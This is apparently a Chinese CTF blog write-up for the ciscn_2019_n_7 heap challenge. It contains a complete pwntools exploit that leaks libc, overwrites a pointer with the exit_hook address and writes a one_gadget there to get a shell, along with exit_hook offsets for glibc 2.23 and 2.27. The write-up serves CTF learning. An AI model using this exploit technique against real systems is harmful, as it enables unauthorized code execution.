【exit hook】ciscn_2019_n_7

最新推荐文章于 2024-05-25 09:51:38 发布
最新推荐文章于 2024-05-25 09:51:38 发布
阅读量659 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/115875559
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

【exit hook】ciscn_2019_n_7

1.ida分析

  1. 输入666获得puts地址,计算libc偏移

    在这里插入图片描述

    在这里插入图片描述

    1. 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针

      在这里插入图片描述

      在这里插入图片描述

2.思路

  1. 通过puts计算libc的偏移
  2. 溢出到content指针,修改为exit_hook的地址
  3. edit将exit_hook改为onegadget

3.exp

from pwn import *
p = remote('node3.buuoj.cn',28010)
#p = process('./ciscn_2019_n_7')
elf = ELF('./ciscn_2019_n_7')
libc = ELF('./libc-2.23.so')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'

def get_libc_base():
	p.sendlineafter('Your choice-> \n','666')
	p.recvuntil('0x')
	puts = int(p.recvuntil('\n'),16)
	log.success('puts==>'+hex(puts))
	libc_base = puts - libc.sym['puts']
	log.success('libc_base==>'+hex(libc_base))
	return libc_base
def add(name):
	p.sendlineafter('-> \n','1')
	p.sendlineafter(': \n',str(0x10))
	p.sendafter(':\n',str(name))

def edit(cont):
	p.sendlineafter('-> \n','2')
	p.sendlineafter(':\n','test')
	p.sendlineafter(':\n',str(cont))

def exit():
	p.sendlineafter('-> \n','a')

libc_base = get_libc_base()
exit_hook = libc_base + 0x5f0040 + 3848
one = libc_base + 0xf1147#0xf0364#0xf1207
add('b'*8 + p64(exit_hook))
edit(p64(one))
exit()
p.interactive()

3. exit_hook的地址

#在libc-2.23中
exit_hook = libc_base+0x5f0040+3848

exit_hook = libc_base+0x5f0040+3856

#在libc-2.27中

exit_hook = libc_base+0x619060+3840

exit_hook = libc_base+0x619060+3848
huzai9527
关注
专栏目录
exit_hook劫持
starssgo的博客
04-13 4874
更改exit()某一结构体,再调用exit()可以实现程序流程的劫持。 原理分析 首先查看exit()源代码,我的libc=2.27 调用__run_exit_handlers函数,查看源代码, exit.c 77行。 while (cur->idx > 0) { struct exit_function *const f = &cur->fns[-...
exit_hook和setcontext
最新发布
yjh_fnu_ltn的博客
09-01 1307
exit_hook在pwn题中的应用 - 不会修电脑 - 博客园 (cnblogs.com)exit_hook :是程序在执行exit函数时,会去该位置拿一个函数指针,进而执行的一段程序,如果能修改掉这个函数指针就能挟持程序的控制流,执行想要的gadget。exit(0);return 0;这里用libc-2.32.so演示一下exit的调用过程:先进__run_exit_handlers函数:这里会调用到**_dl_fini函数** ,进入:_dl_fini函数开头的for循环中就调用到了。
ciscn_2019_n_7
z1r0的博客
03-17 561
ciscn_2019_n_7 查看保护 这里将name放入在了qword_202018 + 1这个地址,可以输入到+2的位置 edit的时候改的是 + 2这里的指针,所以这里就存在着一个堆溢出漏洞。 攻击思路:因为add可以改+2位置的指针,所以可以通过add将+2这里指向content的指针给覆盖成exit_hook。因为add被限制所以这里覆盖成exit_hook,然后edit改hook为gadget,这样程序退出的时候会调用exit。 from pwn import * context(ar
ciscn_2019_n_7(exit_hook)、wdb_2018_1st_babyheap(fsop的例子)
weixin_46521144的博客
09-08 1218
ciscn_2019_n_7 劫持exit_hook 这道题考察比较单一,劫持exit_hook即可 在ida里面看到,首先会在本地寻找一个log.txt,否则直接段错误。因此现在本地创建一个log.txt。写不写内容都可以。 接下来是exit_hook的位置 exit_hook的位置 在libc-2.23中 exit_hook = libc_base+0x5f0040+3848 exit_hook = libc_base+0x5f0040+3856 在libc-2.27中 exit_hook = lib
CISCN2021pwn pwny(数组越界,劫持exit_hook
m0_51251108的博客
10-03 1199
CISCN2021pwn pwny(数组越界,劫持exit_hook
pwn题堆利用的一些姿势 -- exit_hook
lifanxin的博客
11-27 2324
exit_hook概述exit_hook 介绍一个例子总结 pwn题堆利用的一些姿势 – free_hook pwn题堆利用的一些姿势 – malloc_hook pwn题堆利用的一些姿势 – IO_FILE pwn题堆利用的一些姿势 – setcontext 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是 PIE 保护和 Full RELRO ,NX 保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了 PIE 保护的话代码段的地址会变,需要泄露代码段基地址才能
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4974
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
BUUCTF-PWN刷题记录-11
weixin_44145820的博客
04-22 878
目录wustctf2020_name_your_cat wustctf2020_name_your_cat
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5322
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1630
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
掌握进程退出的艺术:exit-hook
gitblog_00029的博客
05-25 319
掌握进程退出的艺术:exit-hook exit-hookRun some code when the process exits项目地址:https://gitcode.com/gh_mirrors/ex/exit-hook 在Node.js开发中,确保程序优雅地退出并执行必要的清理工作是一项重要的任务。exit-hook 是一个实用的开源库,它扩展了Node.js的默认退出机制,使你可以更灵...
HookAPI 之 ExitWindowsEX
草原Song
07-28 1840
  有些病毒经常搞的机器无法关机到底是什么原因呢?其实就是HOOKExitWindowsEx这个API函数,以下代码简要实现{主程序}//--------------------------------------------------// 程序作者:zorro MYBlog:http://blog.csdn.net/zorro0920/// QQ:15124763     
iOS越狱开发 常用检测Hook 代码 闪退检测断点
六桥风月IT随笔
03-13 1917
__attribute__((constructor)) static void entry(){ rebind_symbols((struct rebinding[1]){{"abort", abort_hook, (void *)&abort_old}}, 1); rebind_symbols((struct rebinding[2]){{"exit", ...
利用Hook API函数OpenProcess与TerminateProcess来防止任务管理器结束进程【转】
weixin_30834019的博客
10-31 828
思路:其实比较简单,还是利用DLL,首写跟据API函数OpenProcess与TerminateProcess的结构自已编写两个与这两个API一样的函数,再利用GetProcAddress获取系统的那两个API函数入口地址,最后用WriteProcessMemory将你写的函数的地址替换掉原来系统的函数地址。这样所有调用这两系统API都将先执行你的函数。如果只Hook其中一个函数比如只...
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1837
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2633
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
第十四届全国大学生信息安全竞赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-16 1万+
第十四届全国大学生信息安全竞赛
水几个pwn
Stella_Leo的博客
08-24 290
author: moqizou 2020-羊城杯-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值